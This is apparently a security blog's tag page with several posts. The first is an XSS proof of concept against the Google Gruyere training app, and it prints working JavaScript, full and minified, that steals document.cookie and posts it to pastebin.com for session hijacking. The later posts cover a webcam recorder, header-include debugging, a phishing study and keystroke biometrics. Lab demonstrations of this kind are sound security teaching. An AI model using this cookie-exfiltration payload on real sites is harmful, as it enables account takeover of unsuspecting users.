XSS Session Hijacking proof of concept

17 February, 2011 § 6 Comments

I’ve been spending time lately playing with Google Gruyere. I first got introduced to it back when it was called Jarlsberg. After finding all the cross-site scripting vulnerabilities, I thought it would be cool to actually exploit them.

To this day, I had never exploited any of the holes I had found. When disclosing security vulnerabilities, I knew of the potential that a hole could bring with it. While it would be easy to convince myself of the necessity for a fix, I’ve learned it’s much harder to convince others. So I set out on implementing a proof-of-concept for one of the holes in Google Gruyere.

Gruyere allows users to add links to their homepage, however the application doesn’t sanitize the input. Try the following as your homepage and you’ll get a nice alert dialog:

javascript:alert(1)

To exploit this, I wrote the following JavaScript:

function a() {
var xhr =new XMLHttpRequest();
var params = 'paste_code=' + document.cookie + '&paste_name=XSS_poc';
xhr.open("POST","http://pastebin.com/api_public.php",true);
xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xhr.setRequestHeader("Content-length",params.length + "");
xhr.setRequestHeader("Connection","close");
xhr.send(params);
}
a();

I then used the Google Closure Compiler to compress this JavaScript by over 18% and achieved the final code as follows:

var a=new XMLHttpRequest,b="paste_code="+document.cookie+"&paste_name=XSS_poc";a.open("POST","http://pastebin.com/api_public.php",true);a.setRequestHeader("Content-type","application/x-www-form-urlencoded");a.setRequestHeader("Content-length",b.length+"");a.setRequestHeader("Connection","close");a.send(b);

Prefix the JavaScript code with `javascript:`, and you’re off to the races.

So how does this work? This JavaScript, when executed, will take the document’s cookie and send it to Pastebin.com. The attacker will then visit pastebin.com and find the cookie by searching for “XSS_poc” on Pastebin.

I then used a Google Chrome extension called Edit This Cookie to change my cookie to be that of the victim. Hitting Refresh on the page now showed that I was logged in as the victim ūüôā

I recorded a video of the attack and have embedded it below. The music was created by Kevin MacLeod.

What do you think?

Weekend hacking: Homebrew security camera with infinite recording length

24 January, 2011 § 1 Comment

I’ve seen people use security cameras before. Most cameras are set up in a way where the user puts in a VHS tape, presses record, and repeats this process over. If something happened during the recording, the tape will be saved as evidence, otherwise it will be rewound and recorded over again.

This always seemed like a lot of work for something that is purely reactionary. Let’s look at the scenario again. The user is proactively doing a lot of work in the hopes that they will be able to react. Put another way, if you make 20 dollars an hour, over a given month you might spend five or six hours rewinding and pressing record. If there is less than 100 dollars of damage caught on tape, then it wasn’t worth it.

So how about a different solution? At midnight on Friday I decided I would find something better. I had in mind a security camera that kept a circular buffer of the last 8 or so hours. If nothing happened then it would just overwrite what it had previously recorded.

Unfortunately I had no luck finding such a program on the internet, so I decided to write one myself. I first came across OpenCV, which is a free computer vision library. OpenCV is really powerful (and might be a lot of work). I sure didn’t want to write this in C++. Luckily I found technobabbler’s tutorial on how to make a simple webcam application using Python.

I followed the tutorial and had a simple application running that could save a snapshot from the webcam with a simple click of a button. By 4:30am I had a working prototype that was doing just what I wanted.

Using¬†Python 2.5,¬†VideoCapture,¬†PIL,¬†pygame, and FFmpeg, I am able to keep the last 24-hours of snapshots (at 10 frames per second). If I ever want to save those 24 hours for reference, I simply hit the letter ‘s’ on the keyboard.

I’ve made this script open-source under the GPL license and hosted it at Google Code. Let me know what you think.

Finding how a header file gets included

6 May, 2010 § 2 Comments

Have you ever had a header file generate warnings that is not explicitly part of your Visual Studio solution?

Recently I’ve been working on fixing static analysis warnings reported by Microsoft’s PREfast static analysis tool for C++. I ran in to an issue though with some of the Microsoft Windows SDK v6.0 headers. One file, aptly named `strsafe.h`, can be the cause for¬†tons of warnings in a build.

I looked around and found that the Windows SDK team is fully aware of the problem. They recommend wrapping the include for strsafe.h with pragmas, like so:

#include <CodeAnalysis/warnings.h>
#pragma warning(push)
#pragma warning(disable: ALL_CODE_ANALYSIS_WARNINGS)
#include <strsafe.h>
#pragma warning(pop)

So the first thing I did was to search through my code and find out who what included strsafe.h. But it turns out that no file explicitly included it. I figured that it must get included from another include file.

To find out what files are included in your build, you can turn on¬†/showIncludes through the¬†Project Properties ‚쮬†Configuration Properties ‚쮬†C/C++ ‚쮬†Advanced ‚쮬†Show Includes

/showIncludes prints out a tree of all of the files that get included in when the project is built. Using this, I was able to find which SDK files we included that ended up including strsafe.h.

This process took me about a half hour in total from turning the compiler flag on, performing a rebuild, narrowing down the includes, and wrapping them with pragmas. I still got a nasty taste in my mouth for suppressing the warnings, but getting rid of them cut out a lot of noise surrounding actual warnings that are more pressing.

Why Phishing Works

30 April, 2009 § Leave a comment

I just read a paper written in 2006 about why phishing works. Some of the notable comments in it come from participants in the usability study that was done:

From users who looked at security indicators in website content only:

“I never look at the numbers and letters up there [in the address bar]. I’m not sure what they are supposed to say.”

From users who looked at content and domain name only:

Many did not know what an IP address was, they referred to one as a “redirector address”, a “router number”, “ISP number”, “those number thingies in front of the name.”

From users who looked at all of the above and also for HTTPS in the address:
  • One never noticed the padlock in the browser chrome.
  • One stated that favicons in address bars indicate authenticity better than a padlock because they “cannot be copied.”
From users who looked for a padlock icon:

Some participants gave more credence to padlock icons that appeared within the content of the page as opposed to the browser chrome.

Other notes from the reading:

One user mentioned that she verifies the authenticity of a website by trying to log in to the website and seeing if it will work. She said, What’s the harm? Passwords are not dangerous to give out, like financial information.

One of the last tests had the users look at a phishing site that was a direct copy of a real site. The site included an animated graphic of a bear and produced the following responses:

  • The “cute” design was a convincing factor of a legitimate website.
  • Two participants specifically mentioned the bear graphic, “because that would take a lot of effort to copy”.

Many found the animation appealing and reloaded the page multiple times just to see the animation again.

And the last, but not least. When encountering a website with an invalid SSL certificate, the users accepted it and had these quotes:

“I accepted the use of cookies”, “It asked me if I wanted to save my password on forms”, “It was a message from the website about spyware”

Interesting quotes. I’m not sure how to deal with solving this problem. One solution could be to understand what users assume to be secure and simply design towards that.

Background Survey on Keyboard Biometrics

21 February, 2009 § Leave a comment

As part of my research in Computer and Network Security, I am looking in to how we can make simple password protocols more secure without making the login process harder for the user. I have written a background study on previous research that has looked at this problem. Below is an excerpt, and at the bottom of the post you will find a link to my full background survey. Leave a comment and let me know what you think.

The most well-known and accepted way to authenticate users in computer systems deals with entering a username and password. Other authentication techniques include the introduction of the user’s physical features (e. g. retinal or fingerprint scans) or requiring the user to have a special piece of hardware in their possession [1].

These added burdens that are placed on the user make software less usable and may even lead to users not locking their system down as often to avoid a lengthy login process. These systems are put in place for security, yet poor usability may actually lead worse overall security.

One way to solve this problem is to continue to let users simply use their username and password to log in to their system. Previous research has shown that the same factors that make written signatures unique are found in a user’s typing pattern [2]. Meta information can be obtained about how the user enters this information to add another level of security to the authentication protocol, thus increasing security without affecting usability.

For more information and to read the rest of my background survey, you can read the PDF: Background Survey on Keyboard Biometrics

Where Am I?

You are currently browsing entries tagged with security at JAWS.